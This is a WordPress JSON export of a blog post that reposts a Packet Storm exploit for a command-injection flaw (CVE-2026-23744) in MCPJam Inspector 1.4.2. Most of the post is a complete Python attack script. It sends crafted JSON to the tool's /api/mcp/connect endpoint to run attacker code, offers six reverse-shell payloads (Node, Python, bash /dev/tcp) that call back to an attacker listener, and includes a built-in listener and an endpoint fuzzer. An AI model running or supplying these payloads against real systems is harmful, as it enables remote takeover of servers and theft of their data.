{"id":59517,"date":"2026-06-03T13:44:27","date_gmt":"2026-06-03T13:44:27","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=59517"},"modified":"2026-06-03T13:44:27","modified_gmt":"2026-06-03T13:44:27","slug":"mcpjam-inspector-142-command-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=59517","title":{"rendered":"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614"},"content":{"rendered":"

{“lastseen”:”2026-06-03T17:30:46″,”description”:”This is an advanced Python proof of concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and reverse shell access. The script supports multiple payload types, endpoint…”,”published”:”2026-06-03T00:00:00″,”modified”:”2026-06-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:222614″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-23744″],”sourceData”:”==================================================================================================================================\\n | # Title : MCPJam Inspector 1.4.2 MCP API Command Injection to Reverse Shell |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/MCPJam\/inspector |\\n ==================================================================================================================================\\n \\n [+] Summary : An advanced Python Proof-of-Concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and reverse shell access. \\n The script supports multiple payload types, endpoint discovery, listener management, and several exploitation methods for authorized security research and penetration testing.\\n \\t\\t\\t\\t \\n [+] POC : \\n \\n 1. nc -lvnp 4444\\n \\n 2. python3 exploit.py -l 10.0.0.1 -p 4444 -t https:\/\/victim.com\\n \\n # 3. python3 exploit.py -l 10.0.0.1 -p 4444 -t https:\/\/victim.com –scan\\n \\n # 4. python3 exploit.py -l 10.0.0.1 -p 4444 -t https:\/\/victim.com –payload bash\\n \\n # 5. python3 exploit.py -l 10.0.0.1 -p 4444 -t https:\/\/victim.com –timeout 30\\n \\n #!\/usr\/bin\/env python3\\n \\n \\n import argparse\\n import requests\\n import sys\\n import time\\n import threading\\n import socket\\n import json as jsonlib\\n from urllib.parse import urljoin\\n \\n class CVE202623744:\\n def __init__(self, rhost, lhost, lport):\\n self.rhost = rhost.rstrip(‘\/’)\\n self.lhost = lhost\\n self.lport = int(lport)\\n self.session = requests.Session()\\n \\n def check_connectivity(self):\\n \\”\\”\\”Check if target is reachable\\”\\”\\”\\n test_url = urljoin(self.rhost, ‘\/api\/mcp\/health’)\\n try:\\n resp = self.session.get(test_url, timeout=5, verify=False)\\n print(f\\”[+] Target reachable: {resp.status_code}\\”)\\n return True\\n except:\\n print(\\”[-] Target not reachable\\”)\\n return False\\n \\n def start_listener(self):\\n \\”\\”\\”Start netcat listener in a separate thread\\”\\”\\”\\n def listener():\\n try:\\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n sock.bind((self.lhost, self.lport))\\n sock.listen(1)\\n print(f\\”[*] Listening on {self.lhost}:{self.lport}\\”)\\n conn, addr = sock.accept()\\n print(f\\”[+] Connection received from {addr}\\”)\\n \\n while True:\\n data = conn.recv(1024)\\n if not data:\\n break\\n sys.stdout.write(data.decode())\\n sys.stdout.flush()\\n conn.close()\\n except Exception as e:\\n print(f\\”[-] Listener error: {e}\\”)\\n \\n thread = threading.Thread(target=listener, daemon=True)\\n thread.start()\\n time.sleep(1)\\n return thread\\n \\n def generate_payload(self, payload_type=\\”node\\”):\\n \\”\\”\\”Generate different reverse shell payloads\\”\\”\\”\\n \\n payloads = {\\n \\”node\\”: f”'(function(){{\\n var net = require(\\”net\\”),\\n cp = require(\\”child_process\\”),\\n sh = cp.spawn(\\”\/bin\/sh\\”, []);\\n var client = new net.Socket();\\n client.connect({self.lport}, \\”{self.lhost}\\”, function(){{\\n client.pipe(sh.stdin);\\n sh.stdout.pipe(client);\\n sh.stderr.pipe(client);\\n }});\\n return \/a\/;\\n }})();”’,\\n \\n \\”node_enhanced\\”: f”'(function(){{\\n var net = require(\\”net\\”),\\n cp = require(\\”child_process\\”);\\n var sh = cp.spawn(\\”bash\\”, [\\”-i\\”]);\\n var client = new net.Socket();\\n client.connect({self.lport}, \\”{self.lhost}\\”, function(){{\\n client.pipe(sh.stdin);\\n sh.stdout.pipe(client);\\n sh.stderr.pipe(client);\\n client.on(\\”error\\”, function(){{}});\\n }});\\n }})();”’,\\n \\n \\”python\\”: f”’import socket,subprocess,os;\\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\\n s.connect((\\”{self.lhost}\\”,{self.lport}));\\n os.dup2(s.fileno(),0);\\n os.dup2(s.fileno(),1);\\n os.dup2(s.fileno(),2);\\n subprocess.call([\\”\/bin\/sh\\”,\\”-i\\”]);”’,\\n \\”bash\\”: f”’bash -i \\u003e\\u0026 \/dev\/tcp\/{self.lhost}\/{self.lport} 0\\u003e\\u00261”’,\\n \\”b64\\”: f”’echo {self.lhost} {self.lport} | xargs -I {{}} sh -c \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{{}} 0\\u003e\\u00261\\””’,\\n \\”node_short\\”: f”’require(\\”child_process\\”).exec(\\”bash -i \\u003e\\u0026 \/dev\/tcp\/{self.lhost}\/{self.lport} 0\\u003e\\u00261\\”);”’\\n }\\n \\n return payloads.get(payload_type, payloads[\\”node\\”])\\n \\n def exploit(self, payload_type=\\”node\\”, timeout=10):\\n \\”\\”\\”\\n Execute the exploit\\n \\”\\”\\”\\n print(f\\”[*] Target: {self.rhost}\\”)\\n print(f\\”[*] Callback: {self.lhost}:{self.lport}\\”)\\n print(f\\”[*] Payload type: {payload_type}\\”)\\n self.start_listener()\\n payload = self.generate_payload(payload_type)\\n print(f\\”[*] Payload generated (length: {len(payload)} bytes)\\”)\\n url = urljoin(self.rhost, ‘\/api\/mcp\/connect’)\\n request_formats = [\\n {\\n \\”serverId\\”: \\”x\\”,\\n \\”serverConfig\\”: {\\n \\”env\\”: {},\\n \\”command\\”: \\”node\\”,\\n \\”args\\”: [\\”-e\\”, payload]\\n }\\n },\\n {\\n \\”serverId\\”: \\”x\\”,\\n \\”serverConfig\\”: {\\n \\”env\\”: {},\\n \\”command\\”: \\”node\\”,\\n \\”args\\”: [\\”-e\\”, f\\”eval(‘{payload}’)\\”]\\n }\\n },\\n {\\n \\”serverId\\”: \\”x\\”,\\n \\”serverConfig\\”: {\\n \\”env\\”: {},\\n \\”command\\”: \\”sh\\”,\\n \\”args\\”: [\\”-c\\”, f\\”node -e ‘{payload}’\\”]\\n }\\n }\\n ]\\n \\n for idx, json_data in enumerate(request_formats):\\n print(f\\”[*] Attempt {idx + 1}\/{len(request_formats)}\\”)\\n try:\\n resp = self.session.post(\\n url,\\n json=json_data,\\n timeout=timeout,\\n verify=False,\\n headers={‘Content-Type’: ‘application\/json’}\\n )\\n \\n print(f\\”[*] Response: {resp.status_code}\\”)\\n print(f\\”[*] Response body: {resp.text[:200]}\\”)\\n \\n if resp.status_code == 200:\\n print(\\”[+] Payload sent successfully!\\”)\\n print(\\”[*] Check your listener for incoming connection…\\”)\\n return True\\n \\n except requests.exceptions.Timeout:\\n print(\\”[*] Request timed out (may indicate shell execution)\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n \\n print(\\”[-] Exploit failed\\”)\\n return False\\n \\n def fuzz_endpoints(self):\\n \\”\\”\\”\\n Discover API endpoints\\n \\”\\”\\”\\n print(\\”[*] Fuzzing API endpoints…\\”)\\n \\n endpoints = [\\n ‘\/api\/mcp\/connect’,\\n ‘\/api\/mcp\/execute’,\\n ‘\/api\/mcp\/run’,\\n ‘\/mcp\/connect’,\\n ‘\/mcp\/execute’,\\n ‘\/api\/v1\/mcp\/connect’,\\n ‘\/api\/mcp\/shell’,\\n ‘\/api\/execute’,\\n ‘\/api\/command’,\\n ‘\/api\/system\/exec’\\n ]\\n \\n found = []\\n for endpoint in endpoints:\\n url = urljoin(self.rhost, endpoint)\\n try:\\n resp = self.session.post(url, timeout=5, verify=False)\\n if resp.status_code != 404:\\n found.append(endpoint)\\n print(f\\”[+] Found: {endpoint} (status: {resp.status_code})\\”)\\n except:\\n pass\\n \\n return found\\n \\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=’CVE-2026-23744 – MCP API Command Injection PoC’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=”’\\n Examples:\\n python3 exploit.py -l 10.0.0.1 -p 4444 -t http:\/\/target.com\\n python3 exploit.py -l 10.0.0.1 -p 4444 -t http:\/\/target.com –payload bash\\n python3 exploit.py -l 10.0.0.1 -p 4444 -t http:\/\/target.com –scan\\n \\n Payload types: node, node_enhanced, python, bash, b64, node_short\\n ”’\\n )\\n \\n parser.add_argument(‘–lhost’, ‘-l’, required=True, \\n help=’Listener IP address (your machine)’)\\n parser.add_argument(‘–lport’, ‘-p’, required=True, \\n help=’Listener port’)\\n parser.add_argument(‘–rhost’, ‘-t’, required=True, \\n help=’Target URL (e.g., http:\/\/target.com)’)\\n parser.add_argument(‘–payload’, ‘-P’, default=’node’,\\n choices=[‘node’, ‘node_enhanced’, ‘python’, ‘bash’, ‘b64’, ‘node_short’],\\n help=’Payload type (default: node)’)\\n parser.add_argument(‘–scan’, ‘-s’, action=’store_true’,\\n help=’Scan for vulnerable endpoints first’)\\n parser.add_argument(‘–timeout’, ‘-to’, type=int, default=10,\\n help=’Request timeout in seconds (default: 10)’)\\n parser.add_argument(‘–no-verify’, action=’store_true’, default=True,\\n help=’Disable SSL verification (default: enabled)’)\\n \\n args = parser.parse_args()\\n \\n if args.no_verify:\\n import urllib3\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n exploit = CVE202623744(args.rhost, args.lhost, args.lport)\\n \\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 CVE-2026-23744 – MCP API Command Injection PoC \u2551\\n \u2551 \u2551\\n \u2551 by indoushka! \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n \\n if args.scan:\\n endpoints = exploit.fuzz_endpoints()\\n if endpoints:\\n print(f\\”\\\\n[+] Found {len(endpoints)} endpoints: {endpoints}\\”)\\n else:\\n print(\\”[-] No endpoints found\\”)\\n else:\\n if exploit.check_connectivity():\\n exploit.exploit(args.payload, args.timeout)\\n else:\\n print(\\”[-] Cannot reach target. Exiting.\\”)\\n \\n \\n if __name__ == ‘__main__’:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222614″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222614\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-03T17:30:46″,”description”:”This is an advanced Python proof of concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-59517","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=59517\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-03T17:30:46″,”description”:”This is an advanced Python proof of concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=59517\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-03T13:44:27+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614\",\"datePublished\":\"2026-06-03T13:44:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517\"},\"wordCount\":1468,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59517#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517\",\"name\":\"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-03T13:44:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59517\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59517#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=59517","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614 - zero redgem","og_description":"{“lastseen”:”2026-06-03T17:30:46″,”description”:”This is an advanced Python proof of concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and...","og_url":"https:\/\/zero.redgem.net\/?p=59517","og_site_name":"zero redgem","article_published_time":"2026-06-03T13:44:27+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=59517#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=59517"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614","datePublished":"2026-06-03T13:44:27+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=59517"},"wordCount":1468,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=59517#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=59517","url":"https:\/\/zero.redgem.net\/?p=59517","name":"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-03T13:44:27+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=59517#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=59517"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=59517#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MCPJam Inspector 1.4.2 Command Injection_PACKETSTORM:222614"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=59517"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59517\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=59517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=59517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=59517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}